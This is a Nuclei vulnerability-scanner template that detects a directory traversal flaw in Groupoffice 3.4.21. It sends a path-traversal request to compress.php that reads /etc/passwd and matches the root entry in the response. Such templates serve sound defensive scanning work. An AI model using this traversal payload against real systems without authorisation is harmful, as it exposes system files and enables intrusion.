nuclei-templates/vulnerabilities/other/groupoffice-lfi.yaml

27 lines
525 B
YAML

id: groupoffice-lfi
info:
name: Groupoffice 3.4.21 Directory Traversal Vulnerability
author: 0x_Akoko
severity: high
reference:
- https://cxsecurity.com/issue/WLB-2018020249
- http://www.group-office.com
tags: groupoffice,lfi,traversal
requests:
- method: GET
path:
- "{{BaseURL}}/compress.php?file=../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200